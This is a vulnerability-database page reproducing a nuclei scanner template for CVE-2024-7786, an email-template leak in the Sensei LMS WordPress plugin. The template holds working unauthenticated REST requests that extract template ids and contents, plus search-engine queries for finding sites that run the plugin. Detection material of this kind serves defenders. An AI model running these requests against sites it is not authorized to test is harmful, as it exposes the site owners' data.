Lucene search
K

Sensei LMS < 4.24.2 - Email Template Leak

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Sensei LMS plugin < 4.24.2 allows unauthenticated attackers to leak email templates via unprotected REST API routes

Related
Refs
Code
id: CVE-2024-7786

info:
  name: Sensei LMS < 4.24.2 - Email Template Leak
  author: s4e-io
  severity: high
  description: |
    The Sensei LMS WordPress plugin before 4.24.2 does not properly protect some its REST API routes, allowing unauthenticated attackers to leak email templates.
  impact: |
    Unauthenticated attackers can access and leak email templates through unprotected REST API endpoints, potentially exposing sensitive information included in email communications and template configurations.
  remediation: |
    Update Sensei LMS plugin to version 4.24.2 or later to address the REST API protection issue.
  reference:
    - https://wpscan.com/vulnerability/f44e6f8f-3ef2-45c9-ae9c-9403305a548a/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7786
    - https://www.usom.gov.tr/bildirim/tr-24-1387
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-7786
    epss-score: 0.01635
    epss-percentile: 0.73332
  metadata:
    max-request: 2
    verified: true
    vendor: automattic
    product: sensei-lms
    framework: wordpress
    publicwww-query: "/wp-content/plugins/sensei-lms"
    fofa-query: body="/wp-content/plugins/sensei-lms"
  tags: cve,cve2024,wpscan,wp,wp-plugin,wordpress,sensei-lms,exposure,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"id","date_gmt","slug")'
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: json
        part: body
        name: template_id
        json:
          - '.[0].id'
        internal: true

  - raw:
      - |
        GET /index.php/wp-json/wp/v2/sensei_email/{{template_id}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'sensei_email_preview_id={{template_id}}'
          - 'media?parent={{template_id}}'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d2e8eadd84c543044a13d17056f84d7939da106e1dbba3588201d0fe508e091302200d2a256504baee74c05d54fd6614b38216943e736cd83715c3206f8c214385ea:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.15.3 - 7.5
EPSS0.01635
SSVC
15